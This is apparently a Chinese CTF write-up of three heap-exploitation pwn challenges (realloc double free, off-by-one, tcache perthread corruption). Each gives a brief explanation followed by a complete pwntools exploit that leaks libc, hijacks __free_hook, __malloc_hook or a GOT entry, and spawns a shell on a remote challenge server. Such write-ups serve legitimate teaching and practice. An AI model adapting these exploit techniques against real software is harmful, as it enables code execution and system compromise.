目錄
ciscn_2019_es_5(realloc double free)
申請沒有大小限制,數目上限爲10
edit會調用realloc重新申請(其實不會的,因爲大小不變)
如果edit就不能show了
看了一下這題沒有什麼明顯漏洞,但是考慮到realloc這裏比較特別,這裏再貼一下realloc用法
:
size == 0 ,這個時候等同於free
realloc_ptr == 0 && size > 0 , 這個時候等同於malloc
malloc_usable_size(realloc_ptr) >= size, 這個時候等同於edit
malloc_usable_size(realloc_ptr) < szie, 這個時候纔是malloc一塊更大的內存,將原來的內容複製過去,再將原來的chunk給free掉
如果我們malloc(0),內存管理器仍然會給我們一個0x20大小的chunk,但是如果到了realloc它就會被釋放了,然後我們再delete它就造成了double free
然後就是泄露libc,因爲沒有大小限制,我們申請一個大一點的chunk,釋放後進入unsorted bin,然後malloc(8),這樣會切割unsorted bin,之後show()就能泄露main_arena+1168的地址了
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28564)
#r = process("./ciscn_2019_es_5")
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *$rebase(0x103B)
x/10gx $rebase(0x202060)
c
''')
elf = ELF("./ciscn_2019_es_5")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
menu = "Your choice:"
def add(size, content):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("size?>")
r.sendline(str(size))
r.recvuntil("content:")
r.sendline(content)
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Index:")
r.sendline(str(index))
def show(index):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index:")
r.sendline(str(index))
def edit(index, content, re=True):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index:")
r.sendline(str(index))
if re == True:
r.recvuntil("New content:")
r.send(content)
add(0x500, 'idx0\n')
add(0, '')#1
delete(0)
add(8, 'aaaaaaaa')#0
show(0)
r.recvuntil('a'*8)
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 1168 - 0x10
libc.address = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc.sym['__free_hook']
system = libc.sym['system']
success("libc:"+hex(libc.address))
edit(1, '', False)
delete(1)
add(0x10, p64(free_hook))#1
add(0x10, p64(system))#2
add(0x20, '/bin/sh')#3
delete(3)
r.interactive()
npuctf_2020_easyheap(off-by-one)
這題還是有點意思的
add有大小限制
唯一的漏洞是edit的off-by-one
本題我們的做法就是偷樑換柱,因爲edit有1個字節溢出,而這個溢出能修改堆上存放大小和指針的控制結構的chunk的size,如果我們申請了0x20,按照程序會申請兩個0x20的chunk。這個時候我們用溢出把size改爲0x41,釋放就能獲得一個0x20和0x40的chunk,此時我們申請0x40就能控制一個控制結構了
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 26577)
#r = process("./npuctf_2020_easyheap")
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400E50
x/10gx 0x6020A0
c
''')
elf = ELF("./npuctf_2020_easyheap")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
atoi_got = elf.got['atoi']
menu = "Your choice :"
def add(size, content):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("Size of Heap(0x10 or 0x20 only) : ")
r.sendline(str(size))
r.recvuntil("Content:")
r.sendline(content)
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Index :")
r.sendline(str(index))
def show(index):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index :")
r.sendline(str(index))
def edit(index, content):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index :")
r.sendline(str(index))
r.recvuntil("Content: ")
r.send(content)
add(0x18, 'aa\n')#0
add(0x18, 'aa\n')#1
add(0x18, 'aa\n')#2
edit(0, 'a'*0x18+'\x41')
delete(1)
payload = 'a'*0x10+p64(0)+p64(0x21)+p64(8)+p64(atoi_got)
add(0x38, payload)#1
show(1)
r.recvuntil("Content : ")
atoi_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
libc.address = atoi_addr - libc.sym['atoi']
system = libc.sym['system']
success("libc:"+hex(libc.address))
edit(1, p64(system))
r.recvuntil(menu)
r.sendline('sh')
r.interactive()
ciscn_2019_sw_5(tcache perthread corruption)
申請大小固定,並且能輸出內容
刪除機會有3次,並且指針懸掛
利用思路:
- 先進行double free,然後編輯時利用partial rewrite把tcache的fd改爲80,然後利用添加時候的輸出泄露出heap base
- 接着申請,當heap_base+0x250的chunk被申請出之後在heap_base+0x270處的chunk的fd處寫入heap_base+0x20的地址
- 當heap_base+0x270處的chunk被申請處之後,heap_base+0x20的地址就會被放入tcache,然後申請出來,並且把tcache控制結構的0x80大小地方寫入heap_base+0x60的地址,並且在heap_base+0x50處僞造一個0x200大小的chunk,然後用add申請出這個僞造的chunk,並且釋放,因爲大小爲0x200因此會被放入unsorted bin,partial rewrite之後就泄露
__malloc_hook
的地址 - 把tcache控制結構的0x80大小地方寫入
__malloc_hook
的地址,並且寫入one_gadget即可
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28661)
#r = process("./ciscn_2019_sw_5")
context.log_level = 'debug'
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *$rebase(0x8D7)
x/20gx $rebase(0x202040)
bin
''')
elf = ELF("./ciscn_2019_sw_5")
libc = ELF("./libc/libc-2.27.so")
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
def add(title, content):
r.recvuntil(">> ")
r.sendline('1')
r.recvuntil("title:\n")
r.send(title)
r.recvuntil("content:\n")
r.send(content)
def delete(index):
r.recvuntil(">> ")
r.sendline('2')
r.recvuntil("index:\n")
r.sendline(str(index))
add('KMFL\n', 'KMFL\n')#0
add('KMFL\n', 'KMFL\n')#1
delete(0)
delete(0)
add('\x80', '\n')#2
heap_base = u64(r.recvuntil('\x20\n')[0:6].ljust(8, '\x00')) - 0x280
success("heap:"+hex(heap_base))
add(p64(heap_base + 0x20),p64(heap_base + 0x20) * 5)#3
add(p64(heap_base + 0x20),p64(heap_base + 0x20) * 5)#4
payload = ('\xf9' * 0x8) * 6
payload += p64(0x250 - 0x50 + 1) + p64(0) * 4 + p64(heap_base + 0x60)
add('\xaa' * 0x8,payload)#5
payload = p64(0) * 3 + p64(heap_base + 0x60)
add(p64(0),payload)#6
delete(6)
payload = p64(0) * 3 + p64(heap_base + 0x60)
add('\x30',payload)
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
libc.address = malloc_hook - libc.sym['__malloc_hook']
success("libc:"+hex(libc.address))
one_gadget = libc.address + one_gadget_18[1]
payload = p64(0) * 3 + p64(malloc_hook)
add(p64(0),payload)
add(p64(one_gadget),'\n')
r.recvuntil(">> ")
r.sendline('1')
r.interactive()